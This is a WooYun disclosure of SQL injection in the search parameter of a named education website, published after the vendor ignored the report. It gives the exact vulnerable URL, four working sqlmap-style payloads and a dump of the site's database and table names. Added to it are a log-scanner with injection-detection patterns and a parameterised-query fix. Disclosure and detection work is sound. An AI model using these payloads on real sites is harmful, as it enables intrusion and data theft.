
Vulnerability summary

Defect ID: wooyun-2013-032324

Title: SQL injection vulnerability on the 2277.com main site

Vendor: 面对面互动教育网

Author: c2c2

Submitted: 2013-07-25 23:33

Fix deadline: 2013-09-08 23:34

Published: 2013-09-08 23:34

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: vendor could not be contacted, or vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2013-07-25: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly
2013-09-08: Vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

SQL injection on the www.2277.com main site; the data of the entire site is exposed

Detailed description:

Injection point:

http://www.2277.com/index.php?r=search/course&k=123


Injected parameter: k
---
Place: GET
Parameter: k
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: r=search/course&k=123' AND 8835=8835#
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: r=search/course&k=123' AND (SELECT 5293 FROM(SELECT COUNT(*),CONCAT(0x7168746571,(SELECT (CASE WHEN (5293=5293) THEN 1 ELSE 0 END)),0x716e797171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'QONP'='QONP
Type: UNION query
Title: MySQL UNION query (NULL) - 2 columns
Payload: r=search/course&k=-1912' UNION ALL SELECT CONCAT(0x7168746571,0x59587a694d7a48595554,0x716e797171),NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: r=search/course&k=123' AND SLEEP(5) AND 'wMJu'='wMJu
---
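The four technique footprints listed above (boolean-based, error-based, UNION-based and time-based) are what a defender would look for in web-server access logs while this kind of report is being triaged. The following is an added example, not part of the original report or the vendor's code: a small scanner that URL-decodes each query parameter and matches it against signatures derived from the payload shapes shown above. The access-log lines are constructed for illustration (the client IP is a documentation address) and the log format is assumed to be the common Apache/nginx combined format.

```python
"""Flag access-log requests carrying SQL-injection footprints (added example)."""
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Each pattern names the injection technique whose footprint it matches.
# Patterns are applied to the URL-decoded value of every query parameter.
SIGNATURES = {
    # 123' AND 8835=8835#  (quote, boolean operator, tautology)
    "boolean-based": re.compile(r"'\s*(and|or)\s+\d+\s*=\s*\d+", re.I),
    # FLOOR(RAND(0)*2) ... FROM INFORMATION_SCHEMA ... GROUP BY (duplicate-key error trick)
    "error-based": re.compile(r"information_schema|floor\(\s*rand\(", re.I),
    # -1912' UNION ALL SELECT ...
    "union-based": re.compile(r"union\s+(all\s+)?select", re.I),
    # ' AND SLEEP(5) ...
    "time-based": re.compile(r"\bsleep\s*\(|benchmark\s*\(", re.I),
    # 0x7168746571 / 0x716e797171 are the hex delimiters the tool wraps extracted
    # data in; a long 0x-prefixed literal in a search parameter is itself suspicious.
    "hex-literal": re.compile(r"0x[0-9a-f]{6,}", re.I),
}

# Combined log format: ip ident user [time] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Constructed sample lines (not real traffic); payload shapes follow the report.
SAMPLE_LOG = [
    '203.0.113.5 - - [25/Jul/2013:23:10:01 +0800] "GET /index.php?r=search/course&k=123 HTTP/1.1" 200 5120',
    '203.0.113.5 - - [25/Jul/2013:23:10:02 +0800] "GET /index.php?r=search/course&k=123%27%20AND%208835%3D8835%23 HTTP/1.1" 200 5120',
    '203.0.113.5 - - [25/Jul/2013:23:10:03 +0800] "GET /index.php?r=search/course&k=-1912%27%20UNION%20ALL%20SELECT%20CONCAT(0x7168746571,NULL),NULL%23 HTTP/1.1" 200 611',
    '203.0.113.5 - - [25/Jul/2013:23:10:04 +0800] "GET /index.php?r=search/course&k=123%27%20AND%20SLEEP(5)%20AND%20%27wMJu%27%3D%27wMJu HTTP/1.1" 200 5120',
]


def flag_request(line):
    """Return a list of (parameter, technique) pairs found in one log line.

    An unparsable line or a clean request yields an empty list.
    """
    m = LOG_RE.match(line)
    if not m:
        return []
    query = urlsplit(m.group("target")).query
    hits = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        # parse_qsl already decoded once; decode again to catch double-encoding.
        decoded = unquote_plus(value)
        for technique, pattern in SIGNATURES.items():
            if pattern.search(decoded):
                hits.append((name, technique))
    return hits


def scan_log(lines):
    """Summarise flagged requests as (client ip, parameter, technique) tuples."""
    findings = []
    for line in lines:
        for param, technique in flag_request(line):
            ip = LOG_RE.match(line).group("ip")
            findings.append((ip, param, technique))
    return findings


if __name__ == "__main__":
    for ip, param, technique in scan_log(SAMPLE_LOG):
        print(f"{ip}\tparam={param}\t{technique}")
```

Signature matching of this kind is a triage aid, not a control: it is easy to evade with encoding or comment tricks and it will flag legitimate searches that happen to contain words like "union select". Its value is in quickly finding the first probe against a parameter such as k, so that the fix (parameterised queries) can be prioritised and the affected accounts reviewed.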

Proof of vulnerability:

[INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0
available databases [9]:
[*] 2277_bbs
[*] bbs_v2
[*] bill
[*] edu_db
[*] f2f
[*] information_schema
[*] mysql
[*] performance_schema
[*] test


Database: f2f
[124 tables]
+------------------------------------+
| tb_check_list |
| tb_comments |
| tb_common_sequence |
| tb_course |
| tb_course_category |
| tb_course_category_course |
| tb_course_lesson_evaluate |
| tb_course_lesson_pay |
| tb_course_lesson_present |
| tb_course_lesson_screenshot |
| tb_course_period |
| tb_course_schedule |
| tb_courseware |
| tb_courseware_download |
| tb_courseware_reference |
| tb_deploy_classroom |
| tb_deploy_course_service |
| tb_deploy_course_status |
| tb_deploy_host |
| tb_deploy_host_ip |
| tb_deploy_online_log |
| tb_deploy_service |
| tb_deploy_service_type |
| tb_deploy_telecom |
| tb_group_buy |
| tb_group_buy_order |
| tb_order |
| tb_order_course |
| tb_order_course_evaluate |
| tb_pay_channel |
| tb_pay_currency |
| tb_pay_income_log |
| tb_pay_recharge |
| tb_pay_withdrawl |
| tb_permission_item |
| tb_permission_role |
| tb_permission_role_permission |
| tb_permission_user_role |
| tb_refund_order |
| tb_refund_process |
| tb_refund_reason |
| tb_school |
| tb_school_category |
| tb_school_category_course |
| tb_school_category_school |
| tb_school_contract |
| tb_school_course_category |
| tb_school_evaluate |
| tb_school_member |
| tb_school_member_permission |
| tb_school_permission_info |
| tb_school_permission_item |
| tb_school_permission_item_category |
| tb_setting_bank |
| tb_setting_city |
| tb_setting_country |
| tb_setting_province |
| tb_user_bank |
| tb_user_blacklist |
| tb_user_edu |
| tb_user_email_verify |
| tb_user_evaluate |
| tb_user_favorite |
| tb_user_favorite_category |
| tb_user_finger_email |
| tb_user_finger_mobilephone |
| tb_user_finger_username |
| tb_user_info |
| tb_user_loginlog |
| tb_user_register |
| tb_user_secure_question |
| tb_user_visit |
| tb_web_active_vote |
| tb_web_activity |
| tb_web_activity_application |
| tb_web_article |
| tb_web_article_activity |
| tb_web_article_type |
| tb_web_auth_module |
| tb_web_auth_module_operate |
| tb_web_auth_operate |
| tb_web_auth_role |
| tb_web_banner |
| tb_web_banner_datasource |
| tb_web_banner_log |
| tb_web_category |
| tb_web_category_info |
| tb_web_elite_type |
| tb_web_exinfo |
| tb_web_index_module |
| tb_web_index_module_type |
| tb_web_keyword |
| tb_web_log |
| tb_web_message |
| tb_web_message_receiver |
| tb_web_newbanner |
| tb_web_newbanner_type |
| tb_web_params |
| tb_web_real_identification |
| tb_web_student_taste |
| tb_web_tuan_course |
| tb_web_video_course |
| tb_web_video_course_active |
| tb_web_violation |
| v_analyse_evaluate_condition |
| v_deploy_classroom |
| v_deploy_classroom_all |
| v_deploy_service_host_ip |
| v_deploy_service_ip |
| v_evaluate_course |
| v_evaluate_learner |
| v_evaluate_period |
| v_evaluate_school |
| v_evaluate_teacher |
| v_good_evaluate_course |
| v_good_evaluate_learner |
| v_good_evaluate_period |
| v_good_evaluate_school |
| v_good_evaluate_teacher |
| v_learners_course |
| v_learners_course_period |
| v_learners_lesson |
| v_learners_lesson_time |
| v_query_pendpay_info |
+------------------------------------+

Fix recommendation:

Filter the input.
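"Filter" is the report's one-word fix; the robust form of that advice is to stop building the query from the k parameter as text at all and bind it as a parameter, with length validation and LIKE-wildcard escaping on top. The following is an added example and is not the site's code: the tb_course table and its rows are constructed here, and the query shape (a LIKE search on a course name) is an assumption about what r=search/course&k=... does. SQLite is used so the example runs offline; the bound-parameter pattern is the same with MySQL drivers (mysqli/PDO prepared statements in PHP, PyMySQL in Python).

```python
"""Parameterised course search as the hardened form of the k lookup (added example)."""
import sqlite3


def build_db():
    """Create an in-memory table with constructed rows (not the site's data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE tb_course (id INTEGER PRIMARY KEY, name TEXT NOT NULL)")
    conn.executemany(
        "INSERT INTO tb_course (name) VALUES (?)",
        [
            ("Course 123: Intro to Databases",),
            ("Course 456: Web Security",),
            ("100% Practical SQL",),
        ],
    )
    return conn


def escape_like(term):
    """Escape LIKE metacharacters so user text is matched literally.

    Binding the value already prevents injection; this extra step stops a
    bare '%' or '_' from turning a search into a full-table match.
    """
    return term.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")


def search_course(conn, k, limit=50):
    """Return course names whose name contains k.

    The vulnerable shape this replaces interpolates k into the SQL text, e.g.
    f"... WHERE name LIKE '%{k}%'", which is how a quote in k reaches the parser.
    Here k only ever travels as a bound parameter, so 123' AND 8835=8835# is
    just a string that matches nothing.
    """
    if not isinstance(k, str) or len(k) > 100:
        return []  # reject oversized or non-string input before touching the DB
    pattern = "%" + escape_like(k) + "%"
    rows = conn.execute(
        "SELECT id, name FROM tb_course WHERE name LIKE ? ESCAPE '\\' LIMIT ?",
        (pattern, limit),
    ).fetchall()
    return [name for _, name in rows]


if __name__ == "__main__":
    db = build_db()
    for term in ("123", "123' AND 8835=8835#", "%"):
        print(repr(term), "->", search_course(db, term))
```

Note the ESCAPE clause: without it, escape_like would be pointless, and a search for "%" would return every row, which is a data-exposure issue in its own right even once injection is closed.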

Copyright notice: please credit the source when republishing: c2c2@乌云 (WooYun)


Vulnerability response

Vendor response:

Vendor could not be contacted, or vendor actively refused the report